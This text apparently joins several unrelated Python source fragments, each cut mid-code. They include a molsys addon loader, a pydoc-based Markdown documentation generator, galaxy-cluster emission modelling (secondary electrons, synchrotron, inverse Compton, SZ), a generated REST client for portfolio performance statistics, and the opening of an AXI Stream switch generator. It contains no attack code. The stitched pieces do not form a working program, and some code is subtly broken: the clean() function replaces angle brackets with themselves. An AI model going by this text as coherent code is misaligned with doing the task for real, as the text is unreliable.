##### addons ####################################################################################
def addon(self, addmod, *args, **kwargs):
"""
add an addon module to this object
the adddon will be an instance of the addon class and available as attribute of mol instance
Args:
addmod (string): string name of the addon module
*args : positional arguments for the addon instantiator
**kwargs : keyword arguments for the addon instantiator
"""
if addmod in self.loaded_addons:
logger.warning("\"%s\" addon is already available as attribute of mol instance!" % addmod)
loaded = False
return loaded
if addmod in addon.__all__: ### addon is enabled: try to set it
addclass = getattr(addon, addmod, None)
if addclass is not None: ### no error raised during addon/__init__.py import
if inspect.isclass(addclass):
### get the addon attribute, initialize it and set as self attribute
addinst = addclass(self, *args, **kwargs)
setattr(self, addmod, addinst)
loaded = True ### the addon is now available as self.addmod
elif inspect.ismodule(addclass):
### to enable syntax: 'from molsys.addon.addmod import addmod'
# in this case, e.g.: addon.ff is the MODULE, not the CLASS, so that we need TWICE
# the 'getattr' to get molsys.addon.ff.ff
addclass = getattr(addclass, addmod)
addinst = addclass(self, *args, **kwargs)
setattr(self, addmod, addinst)
loaded = True ### the addon is now available as self.addmod
else:
import traceback
traceback.print_exc()
logger.error("\"%s\" addon is not available: %s" % (addmod, sys.exc_info()[1]) )
loaded = False
else: ### error raised during addon/__init__.py import
print(addon._errortrace[addmod])
logger.error("\"%s\" addon is not imported: check addon module" % addmod)
loaded = False
else: ### addon in unknown or disabled in addon.__all__
logger.error("\"%s\" addon is unknown/disabled: check addon.__all__ in addon module" % addmod)
loaded = False
if loaded:
### addmod added to loaded_addons (to prevent further adding)
logger.info("\"%s\" addon is now available as attribute of mol instance" % addmod)
self.loaded_addons.append(addmod)
#assert addmod in self.loaded_addons, "%s not available" % addmod ### KEEP for testing
return loaded
| |
# -*- coding: utf-8 -*-
# Copyright (c) 2020 <NAME>
# Copyright (c) 2020 Phryk
# Copyright (c) 2001 <NAME>
# This file is licensed under
# The Python Software Foundation License Version 2
# https://github.com/python/cpython/blob/2.7/LICENSE
"""
pydocmk preprocessor
"""
import __builtin__
import os
import re
import sys
import string
import codecs
import collections
import inspect
import pkgutil
import pydoc
import jinja2
from markdown import Markdown
extra_extensions = []
# if 'markdown.extensions.codehilite' in extra_extensions:
# import markdown.extensions.codehilite
# extra_extensions.pop(extra_extensions.index(
# 'markdown.extensions.codehilite'))
# extra_extensions.append(
# markdown.extensions.codehilite.CodeHiliteExtension(linenums=False))
md = Markdown(
output_format='xhtml5',
extensions=extra_extensions
)
def clean(text):
""" mainly for cleaning < and > from `Repr`s """
return text.replace('<', '<').replace('>', '>')
class MarkdownRepr(pydoc.TextRepr, object):
def repr_string(self, x, level):
return clean(super(MarkdownRepr, self).repr_string(x, level))
def repr1(self, x, level):
return clean(super(MarkdownRepr, self).repr1(x, level))
class MarkdownDoc(pydoc.HTMLDoc, object):
"""
FIXME: doc* functions need an extra "level" parameter so we can the fitting h[1-6]
This required overriding the 'document' function, but can only be done once all doc*
functions are implemented.
"""
level_offset = None
local = None
index_url = None
def __init__(self, level_offset=0, local=False, index_url='./'):
self.level_offset = level_offset
self.local = local
self.index_url = index_url
# some utility functions first
def getdoc(self, object):
doc = pydoc.getdoc(object)
return '\n\n<pre class="doc" markdown="0">%s</pre>\n\n' % (doc)
def heading(self, level, content, html=True):
""" Create a HTML heading """
level += self.level_offset
if level > 6:
level = 6 # HTML headings only go from h1 to h6
if html:
return "<h%d>%s</h%d>" % (level, content, level)
else:
return "\n\n%s %s\n\n" % ("#" * level, content)
def url(self, name):
""" Create URL for a documentable thing. Mainly intended for subclassing """
return "./%s.html" % name # TODO proper
def listing(self, items, formatter=None):
if formatter is not None:
items = ['<li>' + formatter(item) + '</li>' for item in items]
# <ul> might not be semantically correct, <ol> a better choice?
return '<ul class="list">%s</ul>' % ''.join(items)
def preformat(self, text):
return text
def modpkglink(self, data):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = data
if shadowed:
return '<span class="shadowed">name</span>'
if path:
url = self.url('%s.%s' % (path, name))
else:
url = self.url(name)
if ispackage:
text = '<span class="package-name">%s</span> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def modulelink(self, object):
"""Make a link for a module."""
# return '<a href="%s">%s</a>' % (self.url(object.__name__), object.__name__) # TODO No module links because global modules are included
return '%s' % (object.__name__)
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s#%s">%s</a>' % (
self.url(module.__name__), name, pydoc.classname(object, modname))
return pydoc.classname(object, modname)
def formattree(self, tree, modname, parent=None):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = '<ul class="tree">'
for entry in tree:
result += '<li>'
if type(entry) is type(()): # means this is info about a class
c, bases = entry
result += '<span class="class-name">' + \
self.classlink(c, modname) + '</span>'
if bases and bases != (parent,):
parents = map(
lambda c, m=modname: pydoc.classname(c, m), bases)
result += '(<span class="bases">%s</span>)' % ', '.join(parents)
# means this is a list of child classes of the previous item
elif type(entry) is type([]):
result += self.formattree(entry, modname, c)
result += '</li>'
result += '</ul>'
return result
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names.
i.e. Replaces plaintext URLs with linked versions
Also escapes input text
"""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match:
break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append(
'<a href="%s" target="_blank" rel="noreferrer noopener">%s</a>' % (url, url))
elif rfc:
url = 'https://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append(
'<a href="%s" target="_blank" rel="noreferrer noopener">%s</a>' % (url, escape(all)))
elif pep:
url = 'https://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append(
'<a href="%s" target="_blank" rel="noreferrer noopener">%s</a>' % (url, escape(all)))
elif selfdot:
# Create a link for methods like 'self.method(...)'
# and use <strong> for attributes like 'self.attr'
if text[end:end+1] == '(':
results.append('self.' + self.namelink(name, methods))
else:
results.append('self.<strong>%s</strong>' % name)
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return ''.join(results)
# now the things doing the heavy lifting
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML5 documentation for a module object."""
level = 1 # FIXME: use passed level in the future
components = {} # where we're storing all components to be output
name = object.__name__ # ignore the passed-in name. not passed in anyways?
try:
all = object.__all__
except AttributeError:
all = None
parts = name.split('.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s">%s</a>' %
(
self.url('.'.join(parts[:i+1])),
parts[i]
)
)
head_link = '.'.join(links + parts[-1:])
try:
path = inspect.getabsfile(object)
if self.local:
url = path
if sys.platform == 'win32': # in case i want to give this to the python project
import nturl2path
url = nturl2path.pathname2url(path)
components['fileref'] = '<a class="file-reference" href="file:%s">%s</a>' % (
url, path)
else:
components['fileref'] = '<span class="file-reference">%s</span>' % path
except TypeError:
components['fileref'] = '<span class="file-reference builtin">(built-in)</span>'
components['fileref'] = '' # TODO remove fileref
info = []
if hasattr(object, '__version__'):
version = pydoc._binstr(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(pydoc._binstr(object.__date__)))
# build the main heading
if info:
components['head'] = self.heading(
level + 1, '%s (<span class="info">%s)' % (head_link, ', '.join(info)))
else:
# heading which is a linked representation of the module "address"
components['head'] = self.heading(level + 1, head_link)
# get the official url of object, if any
docloc = self.getdocloc(object)
if docloc is not None:
components['docloc'] = '<a class="official-docs" href="%s" target="_blank" rel="noreferrer noopener">Module Docs</a>' % docloc
else:
components['docloc'] = ''
# collect modules, classes, functions and data in `object`
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if pydoc.visiblename(key, all, object):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + \
key # key used as URL fragment
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = self.url(
modname) + '#' + key # key used as URL fragment
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if pydoc.visiblename(key, all, object):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value):
fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, pydoc.isdata):
if pydoc.visiblename(key, all, object):
data.append((key, value))
# build documentation for the thing passed in
components['doc'] = self.getdoc(object)
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
components['modules'] = self.heading(
level + 2, 'Package Contents') + self.listing(modpkgs, formatter=self.modpkglink)
elif modules:
components['modules'] = self.heading(level + 2, 'Modules') + self.listing(
[module for _, module in modules], formatter=self.modulelink)
if classes:
classlist = [cls for _, cls in classes]
classtree = self.formattree(
inspect.getclasstree(classlist, 1), name)
classdocs = []
for key, value in classes:
classdocs.append(self.document(value, key, name, fdict, cdict))
components['classes'] = self.heading(level + 2, 'Classes')
components['classes'] += classtree
components['classes'] += '<dl class="classes">'
components['classes'] += '\n'.join(classdocs)
components['classes'] += '</dl>'
if funcs:
docs = []
for key, value in funcs:
docs.append(self.document(value, key, name, fdict, cdict))
components['funcs'] = self.heading(level + 2, 'Functions')
components['funcs'] += '<dl class="functions">'
components['funcs'] += '\n'.join(docs)
components['funcs'] += '</dl>'
if data:
docs = []
for key, value in data:
docs.append(self.document(value, key))
components['data'] = self.heading(level + 2, 'Data')
components['data'] += '<dl class="data">'
components['data'] += '\n'.join(docs)
components['data'] += '</dl>'
if hasattr(object, '__author__'):
components['author'] | |
dN_dEdVdt1 + dN_dEdVdt2
elif flavor == 'numu':
dN_dEdVdt = model.neutrino_spectrum(energy, radius, n_H, flavor='numu').T
elif flavor == 'nue':
dN_dEdVdt = model.neutrino_spectrum(energy, radius, n_H, flavor='nue').T
else :
raise ValueError('Only all, numu and nue flavor are available.')
# Case of K14
elif model == 'Kelner2006':
model = K06.PPmodel(Jp,
Epmin=self._Epmin,
Epmax=self._Epmax,
NptEpPd=self._Npt_per_decade_integ)
# Extract the spectrum
if flavor == 'all':
dN_dEdVdt1 = model.neutrino_spectrum(energy, radius, n_H, limit=limit, flavor='numu').T
dN_dEdVdt2 = model.neutrino_spectrum(energy, radius, n_H, limit=limit, flavor='nue').T
dN_dEdVdt = dN_dEdVdt1 + dN_dEdVdt2
elif flavor == 'numu':
dN_dEdVdt = model.neutrino_spectrum(energy, radius, n_H, limit=limit, flavor='numu').T
elif flavor == 'nue':
dN_dEdVdt = model.neutrino_spectrum(energy, radius, n_H, limit=limit, flavor='nue').T
else :
raise ValueError('Only all, numu and nue flavor are available.')
# Error
else:
raise ValueError('Only Kafexhiu2014 and Kelner2006 models are available.')
return dN_dEdVdt.to('GeV-1 cm-3 s-1')
#==================================================
# Get the secondary electron spectrum
#==================================================
def get_cre2_2d(self, energy=np.logspace(-2,7,100)*u.GeV, radius=np.logspace(0,4,100)*u.kpc):
"""
Compute the electron spectrum as dN/dEdV = f(E, r)
Parameters
----------
- radius (quantity): the physical 3d radius in units homogeneous to kpc, as a 1d array
- energy (quantity) : the physical energy of electrons
Outputs
-------
- dN_dEdV (np.ndarray): the number of electrons per unit volume and energy
"""
# In case the input is not an array
energy = model_tools.check_qarray(energy, unit='GeV')
radius = model_tools.check_qarray(radius, unit='kpc')
# Get the injection rate between the min and max possible, i.e. Epmax
emin = np.amax([(const.m_e*const.c**2).to_value('GeV'),
np.amin(energy.to_value('GeV'))])*u.GeV # min of CRe energy requested, or m_e c^2
emax = self._Epmax
eng = model_tools.sampling_array(emin, emax, NptPd=self._Npt_per_decade_integ, unit=True)
dN_dEdVdt = self.get_rate_cre2(eng, radius) # This is the time consumming part
# Apply the losses
dN_dEdV = self.apply_steady_state_electron_loss(energy, radius, dN_dEdVdt, eng, radius)
return dN_dEdV.to('GeV-1 cm-3')
#==================================================
# Get the CR secondary electron density profile
#==================================================
def get_density_cre2_profile(self, radius=np.logspace(0,4,100)*u.kpc,
Emin=None, Emax=None, Energy_density=False):
"""
Compute the cosmic ray electron density profile, integrating energies
between Emin and Emax.
Parameters
----------
- radius (quantity): the physical 3d radius in units homogeneous to kpc, as a 1d array
- Emin (quantity): the lower bound for energy integration
- Emax (quantity): the upper bound for energy integration
- Energy_density (bool): if True, then the energy density is computed. Otherwise,
the number density is computed.
Outputs
----------
- density (quantity): in unit of cm-3 or GeV cm-3
"""
# In case the input is not an array
radius = model_tools.check_qarray(radius, unit='kpc')
# Define energy
if Emin is None:
Emin = (const.m_e*const.c**2).to('GeV')
if Emax is None:
Emax = self._Epmax
# Integrate over the spectrum
eng = model_tools.sampling_array(Emin, Emax, NptPd=self._Npt_per_decade_integ, unit=True)
dN_dEdV = self.get_cre2_2d(eng, radius)
if Energy_density:
profile = (model_tools.trapz_loglog(np.vstack(eng.to_value('GeV'))*u.GeV * dN_dEdV,
eng, axis=0)).to('GeV cm-3')
else:
profile = (model_tools.trapz_loglog(dN_dEdV, eng, axis=0)).to('cm-3')
return radius, profile
#==================================================
# Get the CR secondary spectrum
#==================================================
def get_cre2_spectrum(self, energy=np.logspace(-2,7,100)*u.GeV, Rmax=None):
"""
Compute the cosmic ray proton spectrum, integrating radius
between 0 and Rmax.
Parameters
----------
- energy (quantity) : the physical energy of CR protons
- Rmax (quantity): the radius within with the spectrum is computed
(default is R500)
Outputs
----------
- spectrum (quantity): in unit of GeV-1
"""
# In case the input is not an array
energy = model_tools.check_qarray(energy, unit='GeV')
# Define the radius for integration
if Rmax is None:
Rmax = self._R500
# Integrate over the considered volume
rmin = np.amin([self._Rmin.to_value('kpc'), Rmax.to_value('kpc')/10])*u.kpc # make sure we go low enough
rad = model_tools.sampling_array(rmin, Rmax, NptPd=self._Npt_per_decade_integ, unit=True)
# To improve precision around R_truncation in integration
if np.amax(rad) > self._R_truncation:
rad = rad.insert(0, self._R_truncation)
rad.sort()
# Get the differential spectrum/profile
dN_dEdV = self.get_cre2_2d(energy, rad)
# Integrate
spectrum = model_tools.trapz_loglog(4*np.pi*rad**2 * dN_dEdV, rad)
return energy, spectrum.to('GeV-1')
#==================================================
# Get the synchrotron spectrum
#==================================================
def get_rate_synchrotron(self, energy=np.logspace(-9,-2,100)*u.eV, radius=np.logspace(0,4,100)*u.kpc):
"""
Compute the synchrotron density as dN/dEdVdt = f(E, r)
Parameters
----------
- energy (quantity) : the physical energy of synchrotron photons
- radius (quantity): the physical 3d radius in units homogeneous to kpc, as a 1d array
Outputs
----------
- dN_dEdVdt (np.ndarray): the differntial production rate
"""
# In case the input is not an array
energy = model_tools.check_qarray(energy, unit='eV')
radius = model_tools.check_qarray(radius, unit='kpc')
# Get the magnetic field
radius, B = self.get_magfield_profile(radius)
# Parse the CRe distribution: returns call function[rad, energy] amd returns f[rad, energy]
def Je(rad, eng):
if self._X_crp_E['X'] == 0:
Sec_e = 0
else:
Sec_e = self.get_cre2_2d(eng*u.GeV, rad*u.kpc).to_value('GeV-1 cm-3').T
if self._X_cre1_E['X'] == 0:
Pri_e = 0
else:
Pri_e = self.get_cre1_2d(eng*u.GeV, rad*u.kpc).to_value('GeV-1 cm-3').T
return Pri_e + Sec_e
# Define the model
model = cluster_electron_emission.ClusterElectronEmission(Je,
Eemin=(const.m_e*const.c**2).to('GeV'),
Eemax=self._Epmax,
NptEePd=self._Npt_per_decade_integ)
# Extract the spectrum: what is long is evaluating Je inside the code
dN_dEdVdt = model.synchrotron(energy, radius_input=radius, B=B).T
return dN_dEdVdt.to('GeV-1 cm-3 s-1')
#==================================================
# Get the IC spectrum
#==================================================
def get_rate_ic(self, energy=np.logspace(-2,7,100)*u.GeV, radius=np.logspace(0,4,100)*u.kpc):
"""
Compute the inverse compton density as dN/dEdVdt = f(E, r)
Note
----------
At high energy, the IC emission analytical parametrization present sharp features
which require a rather high NptEePD (10 is clearly to low and will induce wiggles
in the spectrum)
Parameters
----------
- energy (quantity) : the physical energy of photons
- radius (quantity): the physical 3d radius in units homogeneous to kpc, as a 1d array
Outputs
----------
- dN_dEdVdt (np.ndarray): the differntial production rate
"""
# In case the input is not an array
energy = model_tools.check_qarray(energy, unit='GeV')
radius = model_tools.check_qarray(radius, unit='kpc')
# Parse the CRe distribution: returns call function[rad, energy] amd returns f[rad, energy]
def Je(rad, eng):
if self._X_crp_E['X'] == 0:
Sec_e = 0
else:
Sec_e = self.get_cre2_2d(eng*u.GeV, rad*u.kpc).to_value('GeV-1 cm-3').T
if self._X_cre1_E['X'] == 0:
Pri_e = 0
else:
Pri_e = self.get_cre1_2d(eng*u.GeV, rad*u.kpc).to_value('GeV-1 cm-3').T
return Pri_e + Sec_e
# Define the model
model = cluster_electron_emission.ClusterElectronEmission(Je,
Eemin=(const.m_e*const.c**2).to('GeV'),
Eemax=self._Epmax,
NptEePd=self._Npt_per_decade_integ)
# Extract the spectrum: what is long is evaluating Je inside the code
dN_dEdVdt = model.inverse_compton(energy, radius_input=radius, redshift=self._redshift).T
return dN_dEdVdt.to('GeV-1 cm-3 s-1')
#==================================================
# Get the SZ rate
#==================================================
def get_rate_sz(self, frequency=np.logspace(1,3,100)*u.GHz, radius=np.logspace(0,4,100)*u.kpc,
Compton_only=False):
"""
Compute the SZ emission per unit volume, or the Compton parameter per unit distance.
Parameters
----------
- frequency (quantity) : the physical frequency of photons
- radius (quantity): the physical 3d radius in units homogeneous to kpc, as a 1d array
- Compton_only (bool): Output the Compton parameter instead of the spectrum. In the case of
Compton only, with relativistic correction, y is weighted by the ratio f(nu,T)/f(nu,0)
Outputs
----------
- dE_dtdVdfdO (np.ndarray): the differntial production rate
"""
# In case the input is not an array
frequency = model_tools.check_qarray(frequency, unit='GHz')
radius = model_tools.check_qarray(radius, unit='kpc')
# Get the pressure and temperature profile
radius, temperature = self.get_temperature_gas_profile(radius)
radius, pressure = self.get_pressure_gas_profile(radius)
# Correct temperature for nan (e.g. beyond Rtrunc)
temperature[temperature/temperature != 1] = 0
# Get the SZ spectrum
f_nu = cluster_szspec.tsz_spec_relativistic(frequency, temperature) # 2D: Nfreq, Ntemp
f_nu0 = cluster_szspec.tsz_spec_relativistic(frequency, temperature*0) # Reference non relativistic
I0 = cluster_szspec.get_I0_CMB()
# Get SZ power per unit volume and frequency
if Compton_only:
compton = model_tools.replicate_array(const.sigma_T/(const.m_e*const.c**2) * pressure,
len(frequency), T=False)
#compton_relat = compton * f_nu/f_nu0
output = compton.to('kpc-1')
else:
compton = model_tools.replicate_array(const.sigma_T/(const.m_e*const.c**2) * pressure,
len(frequency), T=False)
dE_dtdVdfdO = compton * I0*f_nu
output = dE_dtdVdfdO.to('eV s-1 cm-3 Hz-1 sr-1')
return output
#==================================================
# Compute a Xspec table versus temperature
#==================================================
def make_xspec_table(self, Emin=0.1*u.keV, Emax=2.4*u.keV,
Tmin=0.1*u.keV, Tmax=50.0*u.keV, nbin=100,
nH=0.0/u.cm**2, file_HI=None, visu_nH=False,
model='APEC',
resp_file=None, data_file=None, app_nH_model=False):
"""
Generate an xspec table as a function of temperature, for the cluster.
This require xspec to be installed.
It requires having a hydrogen column density map in the Healpix format
if nH should be read from a map.
Instrumental response files are needed for computing count rates (in ph/s)
Parameters
----------
- Emin (quantity): Xray band minimal energy (RASS Hard is 0.5-2.4 keV, RASS Soft is 0.1-0.4 keV)
- Emax (quantity): Xray band maximal energy
- | |
39, default: 5)
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.entity. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo i.entity. 50- (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo i.entity. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: start date
:param str stat: A stat type -- /statistics
:param float var_conf_interval: VaR Confidence Interval ( alpha ) i.entity 99, 95, etc - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_client_performance_using_get_with_http_info(client_id, **kwargs) # noqa: E501
else:
(data) = self.get_client_performance_using_get_with_http_info(client_id, **kwargs) # noqa: E501
return data
def get_client_performance_using_get_with_http_info(self, client_id, **kwargs): # noqa: E501
"""Client Performance # noqa: E501
Get information on the performance of a client using IRR (Internal Rate of Return). You must provide the unique client_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_client_performance_using_get_with_http_info(client_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str client_id: Client Id -/client (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str benchmark_id: Client Benchmark or Tenant Benchmark id -/benchmark
:param date end_date: end date
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.entity. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo i.entity. 50- (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo i.entity. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: start date
:param str stat: A stat type -- /statistics
:param float var_conf_interval: VaR Confidence Interval ( alpha ) i.entity 99, 95, etc - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['client_id', 'active_premium_period', 'annualized_return_period', 'benchmark_id', 'end_date', 'hist_factor', 'mar_down_side_deviation', 'max_percentile_monte_carlo', 'mean_percentile_monte_carlo', 'min_percentile_monte_carlo', 'moving_average_n_day', 'n_day_returns', 'n_path_monte_carlo', 'n_rolling_max_drawdown', 'n_rolling_volatility', 'num_sim_monte_carlo', 'period_type', 'risk_free_alpha', 'risk_free_sharpe', 'risk_free_sortino', 'risk_free_treynor', 'start_date', 'stat', 'var_conf_interval'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_client_performance_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'client_id' is set
if ('client_id' not in params or
params['client_id'] is None):
raise ValueError("Missing the required parameter `client_id` when calling `get_client_performance_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'client_id' in params:
path_params['client_id'] = params['client_id'] # noqa: E501
query_params = []
if 'active_premium_period' in params:
query_params.append(('active_premium_period', params['active_premium_period'])) # noqa: E501
if 'annualized_return_period' in params:
query_params.append(('annualized_return_period', params['annualized_return_period'])) # noqa: E501
if 'benchmark_id' in params:
query_params.append(('benchmark_id', params['benchmark_id'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'hist_factor' in params:
query_params.append(('hist_factor', params['hist_factor'])) # noqa: E501
if 'mar_down_side_deviation' in params:
query_params.append(('mar_down_side_deviation', params['mar_down_side_deviation'])) # noqa: E501
if 'max_percentile_monte_carlo' in params:
query_params.append(('max_percentile_monte_carlo', params['max_percentile_monte_carlo'])) # noqa: E501
if 'mean_percentile_monte_carlo' in params:
query_params.append(('mean_percentile_monte_carlo', params['mean_percentile_monte_carlo'])) # noqa: E501
if 'min_percentile_monte_carlo' in params:
query_params.append(('min_percentile_monte_carlo', params['min_percentile_monte_carlo'])) # noqa: E501
if 'moving_average_n_day' in params:
query_params.append(('moving_average_n_day', params['moving_average_n_day'])) # noqa: E501
if 'n_day_returns' in params:
query_params.append(('n_day_returns', params['n_day_returns'])) # noqa: E501
if 'n_path_monte_carlo' in params:
query_params.append(('n_path_monte_carlo', params['n_path_monte_carlo'])) # noqa: E501
if 'n_rolling_max_drawdown' in params:
query_params.append(('n_rolling_max_drawdown', params['n_rolling_max_drawdown'])) # noqa: E501
if 'n_rolling_volatility' in params:
query_params.append(('n_rolling_volatility', params['n_rolling_volatility'])) # noqa: E501
if 'num_sim_monte_carlo' in params:
query_params.append(('num_sim_monte_carlo', params['num_sim_monte_carlo'])) # noqa: E501
if 'period_type' in params:
query_params.append(('period_type', params['period_type'])) # noqa: E501
if 'risk_free_alpha' in params:
query_params.append(('risk_free_alpha', params['risk_free_alpha'])) # noqa: E501
if 'risk_free_sharpe' in params:
query_params.append(('risk_free_sharpe', params['risk_free_sharpe'])) # noqa: E501
if 'risk_free_sortino' in params:
query_params.append(('risk_free_sortino', params['risk_free_sortino'])) # noqa: E501
if 'risk_free_treynor' in params:
query_params.append(('risk_free_treynor', params['risk_free_treynor'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
if 'stat' in params:
query_params.append(('stat', params['stat'])) # noqa: E501
if 'var_conf_interval' in params:
query_params.append(('var_conf_interval', params['var_conf_interval'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/client/{client_id}/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_goal_performance_using_get(self, client_id, goal_id, **kwargs): # noqa: E501
"""Goal Performance # noqa: E501
Get information on the performance of a goal using IRR (Internal Rate of Return). You must provide the unique goal_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_goal_performance_using_get(client_id, goal_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str client_id: Client associated with the account - /client (required)
:param str goal_id: Goal Id - /account (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str benchmark_id: Client Benchmark or Tenant Benchmark id -/benchmark
:param date end_date: end date
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.entity. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo i.entity. 50- (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo i.entity. 20 - (statId: | |
#!/usr/bin/env python
"""
Generates an AXI Stream switch with the specified number of ports
"""
from __future__ import print_function
import argparse
import math
from jinja2 import Template
def main():
parser = argparse.ArgumentParser(description=__doc__.strip())
